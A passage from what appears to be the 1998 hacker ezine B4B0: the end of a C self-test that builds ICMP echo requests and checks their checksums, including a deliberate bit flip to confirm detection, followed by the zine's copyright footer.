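    build_echo_request(buf, sizeof buf, 0x697a, 0, zeros, sizeof zeros);
    ok = icmp_checksum_ok(buf, 64);
    buf[10] ^= 0x01;                    /* constructed corruption in the payload */
    ok = ok && !icmp_checksum_ok(buf, 64);
    ok = ok && build_echo_request(odd, sizeof odd, 1, 7, &one, 1) == 9;
    ok = ok && icmp_checksum_ok(odd, 9);
    return ok;
}
```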
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
[ (c) 1998 The B4B0 Party Programme All Rights Reserved Yo.         ]
[ n0 article or piece of source code from this magazine             ]
[ is to be distributed without the entire issue in its entirety.    ]
[ y3s. we're t4lking to *y0u* rootshell.                            ]
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!